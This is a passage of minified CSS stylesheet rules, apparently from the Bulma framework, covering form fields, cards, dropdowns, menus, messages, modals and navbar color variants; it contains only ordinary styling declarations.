.fa{font-size:14px}.label{color:#363636;display:block;font-size:1rem;font-weight:700}.label:not(:last-child){margin-bottom:.5em}.label.is-small{font-size:.75rem}.label.is-medium{font-size:1.25rem}.label.is-large{font-size:1.5rem}.help{display:block;font-size:.75rem;margin-top:.25rem}.help.is-white{color:#fff}.help.is-black{color:#0a0a0a}.help.is-light{color:#f5f5f5}.help.is-dark{color:#363636}.help.is-primary{color:#00d1b2}.help.is-link{color:#485fc7}.help.is-info{color:#3e8ed0}.help.is-success{color:#48c78e}.help.is-warning{color:#ffe08a}.help.is-danger{color:#f14668}.field:not(:last-child){margin-bottom:.75rem}.field.has-addons{display:flex;justify-content:flex-start}.field.has-addons .control:not(:last-child){margin-right:-1px}.field.has-addons .control:not(:first-child):not(:last-child) .button,.field.has-addons .control:not(:first-child):not(:last-child) .input,.field.has-addons .control:not(:first-child):not(:last-child) .select select{border-radius:0}.field.has-addons .control:first-child:not(:only-child) .button,.field.has-addons .control:first-child:not(:only-child) .input,.field.has-addons .control:first-child:not(:only-child) .select select{border-bottom-right-radius:0;border-top-right-radius:0}.field.has-addons .control:last-child:not(:only-child) .button,.field.has-addons .control:last-child:not(:only-child) .input,.field.has-addons .control:last-child:not(:only-child) .select select{border-bottom-left-radius:0;border-top-left-radius:0}.field.has-addons .control .button:not([disabled]).is-hovered,.field.has-addons .control .button:not([disabled]):hover,.field.has-addons .control .input:not([disabled]).is-hovered,.field.has-addons .control .input:not([disabled]):hover,.field.has-addons .control .select select:not([disabled]).is-hovered,.field.has-addons .control .select select:not([disabled]):hover{z-index:2}.field.has-addons .control .button:not([disabled]).is-active,.field.has-addons .control .button:not([disabled]).is-focused,.field.has-addons .control .button:not([disabled]):active,.field.has-addons .control .button:not([disabled]):focus,.field.has-addons .control .input:not([disabled]).is-active,.field.has-addons .control .input:not([disabled]).is-focused,.field.has-addons .control .input:not([disabled]):active,.field.has-addons .control .input:not([disabled]):focus,.field.has-addons .control .select select:not([disabled]).is-active,.field.has-addons .control .select select:not([disabled]).is-focused,.field.has-addons .control .select select:not([disabled]):active,.field.has-addons .control .select select:not([disabled]):focus{z-index:3}.field.has-addons .control .button:not([disabled]).is-active:hover,.field.has-addons .control .button:not([disabled]).is-focused:hover,.field.has-addons .control .button:not([disabled]):active:hover,.field.has-addons .control .button:not([disabled]):focus:hover,.field.has-addons .control .input:not([disabled]).is-active:hover,.field.has-addons .control .input:not([disabled]).is-focused:hover,.field.has-addons .control .input:not([disabled]):active:hover,.field.has-addons .control .input:not([disabled]):focus:hover,.field.has-addons .control .select select:not([disabled]).is-active:hover,.field.has-addons .control .select select:not([disabled]).is-focused:hover,.field.has-addons .control .select select:not([disabled]):active:hover,.field.has-addons .control .select select:not([disabled]):focus:hover{z-index:4}.field.has-addons .control.is-expanded{flex-grow:1;flex-shrink:1}.field.has-addons.has-addons-centered{justify-content:center}.field.has-addons.has-addons-right{justify-content:flex-end}.field.has-addons.has-addons-fullwidth .control{flex-grow:1;flex-shrink:0}.field.is-grouped{display:flex;justify-content:flex-start}.field.is-grouped>.control{flex-shrink:0}.field.is-grouped>.control:not(:last-child){margin-bottom:0;margin-right:.75rem}.field.is-grouped>.control.is-expanded{flex-grow:1;flex-shrink:1}.field.is-grouped.is-grouped-centered{justify-content:center}.field.is-grouped.is-grouped-right{justify-content:flex-end}.field.is-grouped.is-grouped-multiline{flex-wrap:wrap}.field.is-grouped.is-grouped-multiline>.control:last-child,.field.is-grouped.is-grouped-multiline>.control:not(:last-child){margin-bottom:.75rem}.field.is-grouped.is-grouped-multiline:last-child{margin-bottom:-.75rem}.field.is-grouped.is-grouped-multiline:not(:last-child){margin-bottom:0}@media screen and (min-width:769px),print{.field.is-horizontal{display:flex}}.field-label .label{font-size:inherit}@media screen and (max-width:768px){.field-label{margin-bottom:.5rem}}@media screen and (min-width:769px),print{.field-label{flex-basis:0;flex-grow:1;flex-shrink:0;margin-right:1.5rem;text-align:right}.field-label.is-small{font-size:.75rem;padding-top:.375em}.field-label.is-normal{padding-top:.375em}.field-label.is-medium{font-size:1.25rem;padding-top:.375em}.field-label.is-large{font-size:1.5rem;padding-top:.375em}}.field-body .field .field{margin-bottom:0}@media screen and (min-width:769px),print{.field-body{display:flex;flex-basis:0;flex-grow:5;flex-shrink:1}.field-body .field{margin-bottom:0}.field-body>.field{flex-shrink:1}.field-body>.field:not(.is-narrow){flex-grow:1}.field-body>.field:not(:last-child){margin-right:.75rem}}.control{box-sizing:border-box;clear:both;font-size:1rem;position:relative;text-align:inherit}.control.has-icons-left .input:focus~.icon,.control.has-icons-left .select:focus~.icon,.control.has-icons-right .input:focus~.icon,.control.has-icons-right .select:focus~.icon{color:#4a4a4a}.control.has-icons-left .input.is-small~.icon,.control.has-icons-left .select.is-small~.icon,.control.has-icons-right .input.is-small~.icon,.control.has-icons-right .select.is-small~.icon{font-size:.75rem}.control.has-icons-left .input.is-medium~.icon,.control.has-icons-left .select.is-medium~.icon,.control.has-icons-right .input.is-medium~.icon,.control.has-icons-right .select.is-medium~.icon{font-size:1.25rem}.control.has-icons-left .input.is-large~.icon,.control.has-icons-left .select.is-large~.icon,.control.has-icons-right .input.is-large~.icon,.control.has-icons-right .select.is-large~.icon{font-size:1.5rem}.control.has-icons-left .icon,.control.has-icons-right .icon{color:#dbdbdb;height:2.5em;pointer-events:none;position:absolute;top:0;width:2.5em;z-index:4}.control.has-icons-left .input,.control.has-icons-left .select select{padding-left:2.5em}.control.has-icons-left .icon.is-left{left:0}.control.has-icons-right .input,.control.has-icons-right .select select{padding-right:2.5em}.control.has-icons-right .icon.is-right{right:0}.control.is-loading::after{position:absolute!important;right:.625em;top:.625em;z-index:4}.control.is-loading.is-small:after{font-size:.75rem}.control.is-loading.is-medium:after{font-size:1.25rem}.control.is-loading.is-large:after{font-size:1.5rem}.breadcrumb{font-size:1rem;white-space:nowrap}.breadcrumb a{align-items:center;color:#485fc7;display:flex;justify-content:center;padding:0 .75em}.breadcrumb a:hover{color:#363636}.breadcrumb li{align-items:center;display:flex}.breadcrumb li:first-child a{padding-left:0}.breadcrumb li.is-active a{color:#363636;cursor:default;pointer-events:none}.breadcrumb li+li::before{color:#b5b5b5;content:"\0002f"}.breadcrumb ol,.breadcrumb ul{align-items:flex-start;display:flex;flex-wrap:wrap;justify-content:flex-start}.breadcrumb .icon:first-child{margin-right:.5em}.breadcrumb .icon:last-child{margin-left:.5em}.breadcrumb.is-centered ol,.breadcrumb.is-centered ul{justify-content:center}.breadcrumb.is-right ol,.breadcrumb.is-right ul{justify-content:flex-end}.breadcrumb.is-small{font-size:.75rem}.breadcrumb.is-medium{font-size:1.25rem}.breadcrumb.is-large{font-size:1.5rem}.breadcrumb.has-arrow-separator li+li::before{content:"\02192"}.breadcrumb.has-bullet-separator li+li::before{content:"\02022"}.breadcrumb.has-dot-separator li+li::before{content:"\000b7"}.breadcrumb.has-succeeds-separator li+li::before{content:"\0227B"}.card{background-color:#fff;border-radius:.25rem;box-shadow:0 .5em 1em -.125em rgba(10,10,10,.1),0 0 0 1px rgba(10,10,10,.02);color:#4a4a4a;max-width:100%;position:relative}.card-content:first-child,.card-footer:first-child,.card-header:first-child{border-top-left-radius:.25rem;border-top-right-radius:.25rem}.card-content:last-child,.card-footer:last-child,.card-header:last-child{border-bottom-left-radius:.25rem;border-bottom-right-radius:.25rem}.card-header{background-color:transparent;align-items:stretch;box-shadow:0 .125em .25em rgba(10,10,10,.1);display:flex}.card-header-title{align-items:center;color:#363636;display:flex;flex-grow:1;font-weight:700;padding:.75rem 1rem}.card-header-title.is-centered{justify-content:center}.card-header-icon{-moz-appearance:none;-webkit-appearance:none;appearance:none;background:0 0;border:none;color:currentColor;font-family:inherit;font-size:1em;margin:0;padding:0;align-items:center;cursor:pointer;display:flex;justify-content:center;padding:.75rem 1rem}.card-image{display:block;position:relative}.card-image:first-child img{border-top-left-radius:.25rem;border-top-right-radius:.25rem}.card-image:last-child img{border-bottom-left-radius:.25rem;border-bottom-right-radius:.25rem}.card-content{background-color:transparent;padding:1.5rem}.card-footer{background-color:transparent;border-top:1px solid #ededed;align-items:stretch;display:flex}.card-footer-item{align-items:center;display:flex;flex-basis:0;flex-grow:1;flex-shrink:0;justify-content:center;padding:.75rem}.card-footer-item:not(:last-child){border-right:1px solid #ededed}.card .media:not(:last-child){margin-bottom:1.5rem}.dropdown{display:inline-flex;position:relative;vertical-align:top}.dropdown.is-active .dropdown-menu,.dropdown.is-hoverable:hover .dropdown-menu{display:block}.dropdown.is-right .dropdown-menu{left:auto;right:0}.dropdown.is-up .dropdown-menu{bottom:100%;padding-bottom:4px;padding-top:initial;top:auto}.dropdown-menu{display:none;left:0;min-width:12rem;padding-top:4px;position:absolute;top:100%;z-index:20}.dropdown-content{background-color:#fff;border-radius:4px;box-shadow:0 .5em 1em -.125em rgba(10,10,10,.1),0 0 0 1px rgba(10,10,10,.02);padding-bottom:.5rem;padding-top:.5rem}.dropdown-item{color:#4a4a4a;display:block;font-size:.875rem;line-height:1.5;padding:.375rem 1rem;position:relative}a.dropdown-item,button.dropdown-item{padding-right:3rem;text-align:inherit;white-space:nowrap;width:100%}a.dropdown-item:hover,button.dropdown-item:hover{background-color:#f5f5f5;color:#0a0a0a}a.dropdown-item.is-active,button.dropdown-item.is-active{background-color:#485fc7;color:#fff}.dropdown-divider{background-color:#ededed;border:none;display:block;height:1px;margin:.5rem 0}.level{align-items:center;justify-content:space-between}.level code{border-radius:4px}.level img{display:inline-block;vertical-align:top}.level.is-mobile{display:flex}.level.is-mobile .level-left,.level.is-mobile .level-right{display:flex}.level.is-mobile .level-left+.level-right{margin-top:0}.level.is-mobile .level-item:not(:last-child){margin-bottom:0;margin-right:.75rem}.level.is-mobile .level-item:not(.is-narrow){flex-grow:1}@media screen and (min-width:769px),print{.level{display:flex}.level>.level-item:not(.is-narrow){flex-grow:1}}.level-item{align-items:center;display:flex;flex-basis:auto;flex-grow:0;flex-shrink:0;justify-content:center}.level-item .subtitle,.level-item .title{margin-bottom:0}@media screen and (max-width:768px){.level-item:not(:last-child){margin-bottom:.75rem}}.level-left,.level-right{flex-basis:auto;flex-grow:0;flex-shrink:0}.level-left .level-item.is-flexible,.level-right .level-item.is-flexible{flex-grow:1}@media screen and (min-width:769px),print{.level-left .level-item:not(:last-child),.level-right .level-item:not(:last-child){margin-right:.75rem}}.level-left{align-items:center;justify-content:flex-start}@media screen and (max-width:768px){.level-left+.level-right{margin-top:1.5rem}}@media screen and (min-width:769px),print{.level-left{display:flex}}.level-right{align-items:center;justify-content:flex-end}@media screen and (min-width:769px),print{.level-right{display:flex}}.media{align-items:flex-start;display:flex;text-align:inherit}.media .content:not(:last-child){margin-bottom:.75rem}.media .media{border-top:1px solid rgba(219,219,219,.5);display:flex;padding-top:.75rem}.media .media .content:not(:last-child),.media .media .control:not(:last-child){margin-bottom:.5rem}.media .media .media{padding-top:.5rem}.media .media .media+.media{margin-top:.5rem}.media+.media{border-top:1px solid rgba(219,219,219,.5);margin-top:1rem;padding-top:1rem}.media.is-large+.media{margin-top:1.5rem;padding-top:1.5rem}.media-left,.media-right{flex-basis:auto;flex-grow:0;flex-shrink:0}.media-left{margin-right:1rem}.media-right{margin-left:1rem}.media-content{flex-basis:auto;flex-grow:1;flex-shrink:1;text-align:inherit}@media screen and (max-width:768px){.media-content{overflow-x:auto}}.menu{font-size:1rem}.menu.is-small{font-size:.75rem}.menu.is-medium{font-size:1.25rem}.menu.is-large{font-size:1.5rem}.menu-list{line-height:1.25}.menu-list a{border-radius:2px;color:#4a4a4a;display:block;padding:.5em .75em}.menu-list a:hover{background-color:#f5f5f5;color:#363636}.menu-list a.is-active{background-color:#485fc7;color:#fff}.menu-list li ul{border-left:1px solid #dbdbdb;margin:.75em;padding-left:.75em}.menu-label{color:#7a7a7a;font-size:.75em;letter-spacing:.1em;text-transform:uppercase}.menu-label:not(:first-child){margin-top:1em}.menu-label:not(:last-child){margin-bottom:1em}.message{background-color:#f5f5f5;border-radius:4px;font-size:1rem}.message strong{color:currentColor}.message a:not(.button):not(.tag):not(.dropdown-item){color:currentColor;text-decoration:underline}.message.is-small{font-size:.75rem}.message.is-medium{font-size:1.25rem}.message.is-large{font-size:1.5rem}.message.is-white{background-color:#fff}.message.is-white .message-header{background-color:#fff;color:#0a0a0a}.message.is-white .message-body{border-color:#fff}.message.is-black{background-color:#fafafa}.message.is-black .message-header{background-color:#0a0a0a;color:#fff}.message.is-black .message-body{border-color:#0a0a0a}.message.is-light{background-color:#fafafa}.message.is-light .message-header{background-color:#f5f5f5;color:rgba(0,0,0,.7)}.message.is-light .message-body{border-color:#f5f5f5}.message.is-dark{background-color:#fafafa}.message.is-dark .message-header{background-color:#363636;color:#fff}.message.is-dark .message-body{border-color:#363636}.message.is-primary{background-color:#ebfffc}.message.is-primary .message-header{background-color:#00d1b2;color:#fff}.message.is-primary .message-body{border-color:#00d1b2;color:#00947e}.message.is-link{background-color:#eff1fa}.message.is-link .message-header{background-color:#485fc7;color:#fff}.message.is-link .message-body{border-color:#485fc7;color:#3850b7}.message.is-info{background-color:#eff5fb}.message.is-info .message-header{background-color:#3e8ed0;color:#fff}.message.is-info .message-body{border-color:#3e8ed0;color:#296fa8}.message.is-success{background-color:#effaf5}.message.is-success .message-header{background-color:#48c78e;color:#fff}.message.is-success .message-body{border-color:#48c78e;color:#257953}.message.is-warning{background-color:#fffaeb}.message.is-warning .message-header{background-color:#ffe08a;color:rgba(0,0,0,.7)}.message.is-warning .message-body{border-color:#ffe08a;color:#946c00}.message.is-danger{background-color:#feecf0}.message.is-danger .message-header{background-color:#f14668;color:#fff}.message.is-danger .message-body{border-color:#f14668;color:#cc0f35}.message-header{align-items:center;background-color:#4a4a4a;border-radius:4px 4px 0 0;color:#fff;display:flex;font-weight:700;justify-content:space-between;line-height:1.25;padding:.75em 1em;position:relative}.message-header .delete{flex-grow:0;flex-shrink:0;margin-left:.75em}.message-header+.message-body{border-width:0;border-top-left-radius:0;border-top-right-radius:0}.message-body{border-color:#dbdbdb;border-radius:4px;border-style:solid;border-width:0 0 0 4px;color:#4a4a4a;padding:1.25em 1.5em}.message-body code,.message-body pre{background-color:#fff}.message-body pre code{background-color:transparent}.modal{align-items:center;display:none;flex-direction:column;justify-content:center;overflow:hidden;position:fixed;z-index:40}.modal.is-active{display:flex}.modal-background{background-color:rgba(10,10,10,.86)}.modal-card,.modal-content{margin:0 20px;max-height:calc(100vh - 160px);overflow:auto;position:relative;width:100%}@media screen and (min-width:769px){.modal-card,.modal-content{margin:0 auto;max-height:calc(100vh - 40px);width:640px}}.modal-close{background:0 0;height:40px;position:fixed;right:20px;top:20px;width:40px}.modal-card{display:flex;flex-direction:column;max-height:calc(100vh - 40px);overflow:hidden;-ms-overflow-y:visible}.modal-card-foot,.modal-card-head{align-items:center;background-color:#f5f5f5;display:flex;flex-shrink:0;justify-content:flex-start;padding:20px;position:relative}.modal-card-head{border-bottom:1px solid #dbdbdb;border-top-left-radius:6px;border-top-right-radius:6px}.modal-card-title{color:#363636;flex-grow:1;flex-shrink:0;font-size:1.5rem;line-height:1}.modal-card-foot{border-bottom-left-radius:6px;border-bottom-right-radius:6px;border-top:1px solid #dbdbdb}.modal-card-foot .button:not(:last-child){margin-right:.5em}.modal-card-body{-webkit-overflow-scrolling:touch;background-color:#fff;flex-grow:1;flex-shrink:1;overflow:auto;padding:20px}.navbar{background-color:#fff;min-height:3.25rem;position:relative;z-index:30}.navbar.is-white{background-color:#fff;color:#0a0a0a}.navbar.is-white .navbar-brand .navbar-link,.navbar.is-white .navbar-brand>.navbar-item{color:#0a0a0a}.navbar.is-white .navbar-brand .navbar-link.is-active,.navbar.is-white .navbar-brand .navbar-link:focus,.navbar.is-white .navbar-brand .navbar-link:hover,.navbar.is-white .navbar-brand>a.navbar-item.is-active,.navbar.is-white .navbar-brand>a.navbar-item:focus,.navbar.is-white .navbar-brand>a.navbar-item:hover{background-color:#f2f2f2;color:#0a0a0a}.navbar.is-white .navbar-brand .navbar-link::after{border-color:#0a0a0a}.navbar.is-white .navbar-burger{color:#0a0a0a}@media screen and (min-width:1024px){.navbar.is-white .navbar-end .navbar-link,.navbar.is-white .navbar-end>.navbar-item,.navbar.is-white .navbar-start .navbar-link,.navbar.is-white .navbar-start>.navbar-item{color:#0a0a0a}.navbar.is-white .navbar-end .navbar-link.is-active,.navbar.is-white .navbar-end .navbar-link:focus,.navbar.is-white .navbar-end .navbar-link:hover,.navbar.is-white .navbar-end>a.navbar-item.is-active,.navbar.is-white .navbar-end>a.navbar-item:focus,.navbar.is-white .navbar-end>a.navbar-item:hover,.navbar.is-white .navbar-start .navbar-link.is-active,.navbar.is-white .navbar-start .navbar-link:focus,.navbar.is-white .navbar-start .navbar-link:hover,.navbar.is-white .navbar-start>a.navbar-item.is-active,.navbar.is-white .navbar-start>a.navbar-item:focus,.navbar.is-white .navbar-start>a.navbar-item:hover{background-color:#f2f2f2;color:#0a0a0a}.navbar.is-white .navbar-end .navbar-link::after,.navbar.is-white .navbar-start .navbar-link::after{border-color:#0a0a0a}.navbar.is-white .navbar-item.has-dropdown.is-active .navbar-link,.navbar.is-white .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-white .navbar-item.has-dropdown:hover .navbar-link{background-color:#f2f2f2;color:#0a0a0a}.navbar.is-white .navbar-dropdown a.navbar-item.is-active{background-color:#fff;color:#0a0a0a}}.navbar.is-black{background-color:#0a0a0a;color:#fff}.navbar.is-black .navbar-brand .navbar-link,.navbar.is-black .navbar-brand>.navbar-item{color:#fff}.navbar.is-black .navbar-brand .navbar-link.is-active,.navbar.is-black .navbar-brand .navbar-link:focus,.navbar.is-black .navbar-brand .navbar-link:hover,.navbar.is-black .navbar-brand>a.navbar-item.is-active,.navbar.is-black .navbar-brand>a.navbar-item:focus,.navbar.is-black .navbar-brand>a.navbar-item:hover{background-color:#000;color:#fff}.navbar.is-black .navbar-brand .navbar-link::after{border-color:#fff}.navbar.is-black .navbar-burger{color:#fff}@media screen and (min-width:1024px){.navbar.is-black .navbar-end .navbar-link,.navbar.is-black .navbar-end>.navbar-item,.navbar.is-black .navbar-start .navbar-link,.navbar.is-black .navbar-start>.navbar-item{color:#fff}.navbar.is-black .navbar-end .navbar-link.is-active,.navbar.is-black .navbar-end .navbar-link:focus,.navbar.is-black .navbar-end .navbar-link:hover,.navbar.is-black .navbar-end>a.navbar-item.is-active,.navbar.is-black .navbar-end>a.navbar-item:focus,.navbar.is-black .navbar-end>a.navbar-item:hover,.navbar.is-black .navbar-start .navbar-link.is-active,.navbar.is-black .navbar-start .navbar-link:focus,.navbar.is-black .navbar-start .navbar-link:hover,.navbar.is-black .navbar-start>a.navbar-item.is-active,.navbar.is-black .navbar-start>a.navbar-item:focus,.navbar.is-black .navbar-start>a.navbar-item:hover{background-color:#000;color:#fff}.navbar.is-black .navbar-end .navbar-link::after,.navbar.is-black .navbar-start .navbar-link::after{border-color:#fff}.navbar.is-black .navbar-item.has-dropdown.is-active .navbar-link,.navbar.is-black .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-black .navbar-item.has-dropdown:hover .navbar-link{background-color:#000;color:#fff}.navbar.is-black .navbar-dropdown a.navbar-item.is-active{background-color:#0a0a0a;color:#fff}}.navbar.is-light{background-color:#f5f5f5;color:rgba(0,0,0,.7)}.navbar.is-light .navbar-brand .navbar-link,.navbar.is-light .navbar-brand>.navbar-item{color:rgba(0,0,0,.7)}.navbar.is-light .navbar-brand .navbar-link.is-active,.navbar.is-light .navbar-brand .navbar-link:focus,.navbar.is-light .navbar-brand .navbar-link:hover,.navbar.is-light .navbar-brand>a.navbar-item.is-active,.navbar.is-light .navbar-brand>a.navbar-item:focus,.navbar.is-light .navbar-brand>a.navbar-item:hover{background-color:#e8e8e8;color:rgba(0,0,0,.7)}.navbar.is-light .navbar-brand .navbar-link::after{border-color:rgba(0,0,0,.7)}.navbar.is-light .navbar-burger{color:rgba(0,0,0,.7)}@media screen and (min-width:1024px){.navbar.is-light .navbar-end .navbar-link,.navbar.is-light .navbar-end>.navbar-item,.navbar.is-light .navbar-start .navbar-link,.navbar.is-light .navbar-start>.navbar-item{color:rgba(0,0,0,.7)}.navbar.is-light .navbar-end .navbar-link.is-active,.navbar.is-light .navbar-end .navbar-link:focus,.navbar.is-light .navbar-end .navbar-link:hover,.navbar.is-light .navbar-end>a.navbar-item.is-active,.navbar.is-light .navbar-end>a.navbar-item:focus,.navbar.is-light .navbar-end>a.navbar-item:hover,.navbar.is-light .navbar-start .navbar-link.is-active,.navbar.is-light .navbar-start .navbar-link:focus,.navbar.is-light .navbar-start .navbar-link:hover,.navbar.is-light .navbar-start>a.navbar-item.is-active,.navbar.is-light .navbar-start>a.navbar-item:focus,.navbar.is-light .navbar-start>a.navbar-item:hover{background-color:#e8e8e8;color:rgba(0,0,0,.7)}.navbar.is-light .navbar-end .navbar-link::after,.navbar.is-light .navbar-start .navbar-link::after{border-color:rgba(0,0,0,.7)}.navbar.is-light .navbar-item.has-dropdown.is-active .navbar-link,.navbar.is-light .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-light .navbar-item.has-dropdown:hover .navbar-link{background-color:#e8e8e8;color:rgba(0,0,0,.7)}.navbar.is-light .navbar-dropdown a.navbar-item.is-active{background-color:#f5f5f5;color:rgba(0,0,0,.7)}}.navbar.is-dark{background-color:#363636;color:#fff}.navbar.is-dark .navbar-brand .navbar-link,.navbar.is-dark .navbar-brand>.navbar-item{color:#fff}.navbar.is-dark .navbar-brand .navbar-link.is-active,.navbar.is-dark .navbar-brand .navbar-link:focus,.navbar.is-dark .navbar-brand .navbar-link:hover,.navbar.is-dark .navbar-brand>a.navbar-item.is-active,.navbar.is-dark .navbar-brand>a.navbar-item:focus,.navbar.is-dark .navbar-brand>a.navbar-item:hover{background-color:#292929;color:#fff}.navbar.is-dark .navbar-brand .navbar-link::after{border-color:#fff}.navbar.is-dark .navbar-burger{color:#fff}@media screen and (min-width:1024px){.navbar.is-dark .navbar-end .navbar-link,.navbar.is-dark .navbar-end>.navbar-item,.navbar.is-dark .navbar-start .navbar-link,.navbar.is-dark .navbar-start>.navbar-item{color:#fff}.navbar.is-dark .navbar-end .navbar-link.is-active,.navbar.is-dark .navbar-end .navbar-link:focus,.navbar.is-dark .navbar-end .navbar-link:hover,.navbar.is-dark .navbar-end>a.navbar-item.is-active,.navbar.is-dark .navbar-end>a.navbar-item:focus,.navbar.is-dark .navbar-end>a.navbar-item:hover,.navbar.is-dark .navbar-start .navbar-link.is-active,.navbar.is-dark .navbar-start .navbar-link:focus,.navbar.is-dark .navbar-start .navbar-link:hover,.navbar.is-dark .navbar-start>a.navbar-item.is-active,.navbar.is-dark .navbar-start>a.navbar-item:focus,.navbar.is-dark .navbar-start>a.navbar-item:hover{background-color:#292929;color:#fff}.navbar.is-dark .navbar-end .navbar-link::after,.navbar.is-dark .navbar-start .navbar-link::after{border-color:#fff}.navbar.is-dark .navbar-item.has-dropdown.is-active .navbar-link,.navbar.is-dark .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-dark .navbar-item.has-dropdown:hover .navbar-link{background-color:#292929;color:#fff}.navbar.is-dark .navbar-dropdown a.navbar-item.is-active{background-color:#363636;color:#fff}}.navbar.is-primary{background-color:#00d1b2;color:#fff}.navbar.is-primary .navbar-brand .navbar-link,.navbar.is-primary .navbar-brand>.navbar-item{color:#fff}.navbar.is-primary .navbar-brand .navbar-link.is-active,.navbar.is-primary .navbar-brand .navbar-link:focus,.navbar.is-primary .navbar-brand .navbar-link:hover,.navbar.is-primary .navbar-brand>a.navbar-item.is-active,.navbar.is-primary .navbar-brand>a.navbar-item:focus,.navbar.is-primary .navbar-brand>a.navbar-item:hover{background-color:#00b89c;color:#fff}.navbar.is-primary .navbar-brand .navbar-link::after{border-color:#fff}.navbar.is-primary .navbar-burger{color:#fff}@media screen and (min-width:1024px){.navbar.is-primary .navbar-end .navbar-link,.navbar.is-primary .navbar-end>.navbar-item,.navbar.is-primary .navbar-start .navbar-link,.navbar.is-primary .navbar-start>.navbar-item{color:#fff}.navbar.is-primary .navbar-end .navbar-link.is-active,.navbar.is-primary .navbar-end .navbar-link:focus,.navbar.is-primary .navbar-end .navbar-link:hover,.navbar.is-primary .navbar-end>a.navbar-item.is-active,.navbar.is-primary .navbar-end>a.navbar-item:focus,.navbar.is-primary .navbar-end>a.navbar-item:hover,.navbar.is-primary .navbar-start .navbar-link.is-active,.navbar.is-primary .navbar-start .navbar-link:focus,.navbar.is-primary .navbar-start .navbar-link:hover,.navbar.is-primary .navbar-start>a.navbar-item.is-active,.navbar.is-primary .navbar-start>a.navbar-item:focus,.navbar.is-primary .navbar-start>a.navbar-item:hover{background-color:#00b89c;color:#fff}.navbar.is-primary .navbar-end .navbar-link::after,.navbar.is-primary .navbar-start .navbar-link::after{border-color:#fff}.navbar.is-primary .navbar-item.has-dropdown.is-active .navbar-link,.navbar.is-primary .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-primary .navbar-item.has-dropdown:hover .navbar-link{background-color:#00b89c;color:#fff}.navbar.is-primary .navbar-dropdown a.navbar-item.is-active{background-color:#00d1b2;color:#fff}}.navbar.is-link{background-color:#485fc7;color:#fff}.navbar.is-link .navbar-brand .navbar-link,.navbar.is-link .navbar-brand>.navbar-item{color:#fff}.navbar.is-link .navbar-brand .navbar-link.is-active,.navbar.is-link .navbar-brand .navbar-link:focus,.navbar.is-link .navbar-brand .navbar-link:hover,.navbar.is-link .navbar-brand>a.navbar-item.is-active,.navbar.is-link .navbar-brand>a.navbar-item:focus,.navbar.is-link .navbar-brand>a.navbar-item:hover{background-color:#3a51bb;color:#fff}.navbar.is-link .navbar-brand .navbar-link::after{border-color:#fff}.navbar.is-link .navbar-burger{color:#fff}@media screen and (min-width:1024px){.navbar.is-link .navbar-end .navbar-link,.navbar.is-link .navbar-end>.navbar-item,.navbar.is-link .navbar-start .navbar-link,.navbar.is-link .navbar-start>.navbar-item{color:#fff}.navbar.is-link .navbar-end .navbar-link.is-active,.navbar.is-link .navbar-end .navbar-link:focus,.navbar.is-link .navbar-end .navbar-link:hover,.navbar.is-link .navbar-end>a.navbar-item.is-active,.navbar.is-link .navbar-end>a.navbar-item:focus,.navbar.is-link .navbar-end>a.navbar-item:hover,.navbar.is-link .navbar-start .navbar-link.is-active,.navbar.is-link .navbar-start .navbar-link:focus,.navbar.is-link .navbar-start .navbar-link:hover,.navbar.is-link .navbar-start>a.navbar-item.is-active,.navbar.is-link .navbar-start>a.navbar-item:focus,.navbar.is-link .navbar-start>a.navbar-item:hover{background-color:#3a51bb;color:#fff}.navbar.is-link .navbar-end .navbar-link::after,.navbar.is-link .navbar-start .navbar-link::after{border-color:#fff}.navbar.is-link .navbar-item.has-dropdown.is-active .navbar-link,.navbar.is-link .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-link .navbar-item.has-dropdown:hover .navbar-link{background-color:#3a51bb;color:#fff}.navbar.is-link .navbar-dropdown a.navbar-item.is-active{background-color:#485fc7;color:#fff}}.navbar.is-info{background-color:#3e8ed0;color:#fff}.navbar.is-info .navbar-brand .navbar-link,.navbar.is-info .navbar-brand>.navbar-item{color:#fff}.navbar.is-info .navbar-brand .navbar-link.is-active,.navbar.is-info .navbar-brand .navbar-link:focus,.navbar.is-info .navbar-brand .navbar-link:hover,.navbar.is-info .navbar-brand>a.navbar-item.is-active,.navbar.is-info .navbar-brand>a.navbar-item:focus,.navbar.is-info .navbar-brand>a.navbar-item:hover{background-color:#3082c5;color:#fff}.navbar.is-info .navbar-brand .navbar-link::after{border-color:#fff}.navbar.is-info .navbar-burger{color:#fff}@media screen and (min-width:1024px){.navbar.is-info .navbar-end .navbar-link,.navbar.is-info .navbar-end>.navbar-item,.navbar.is-info .navbar-start .navbar-link,.navbar.is-info .navbar-start>.navbar-item{color:#fff}.navbar.is-info .navbar-end .navbar-link.is-active,.navbar.is-info .navbar-end .navbar-link:focus,.navbar.is-info .navbar-end .navbar-link:hover,.navbar.is-info .navbar-end>a.navbar-item.is-active,.navbar.is-info .navbar-end>a.navbar-item:focus,.navbar.is-info .navbar-end>a.navbar-item:hover,.navbar.is-info .navbar-start .navbar-link.is-active,.navbar.is-info .navbar-start .navbar-link:focus,.navbar.is-info .navbar-start .navbar-link:hover,.navbar.is-info .navbar-start>a.navbar-item.is-active,.navbar.is-info .navbar-start>a.navbar-item:focus,.navbar.is-info .navbar-start>a.navbar-item:hover{background-color:#3082c5;color:#fff}.navbar.is-info .navbar-end .navbar-link::after,.navbar.is-info .navbar-start .navbar-link::after{border-color:#fff}.navbar.is-info .navbar-item.has-dropdown.is-active .navbar-link,.navbar.is-info .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-info .navbar-item.has-dropdown:hover .navbar-link{background-color:#3082c5;color:#fff}.navbar.is-info .navbar-dropdown a.navbar-item.is-active{background-color:#3e8ed0;color:#fff}}.navbar.is-success{background-color:#48c78e;color:#fff}.navbar.is-success .navbar-brand .navbar-link,.navbar.is-success .navbar-brand>.navbar-item{color:#fff}.navbar.is-success .navbar-brand .navbar-link.is-active,.navbar.is-success .navbar-brand .navbar-link:focus,.navbar.is-success .navbar-brand .navbar-link:hover,.navbar.is-success .navbar-brand>a.navbar-item.is-active,.navbar.is-success .navbar-brand>a.navbar-item:focus,.navbar.is-success .navbar-brand>a.navbar-item:hover{background-color:#3abb81;color:#fff}.navbar.is-success .navbar-brand .navbar-link::after{border-color:#fff}.navbar.is-success .navbar-burger{color:#fff}@media screen and (min-width:1024px){.navbar.is-success .navbar-end .navbar-link,.navbar.is-success .navbar-end>.navbar-item,.navbar.is-success .navbar-start .navbar-link,.navbar.is-success 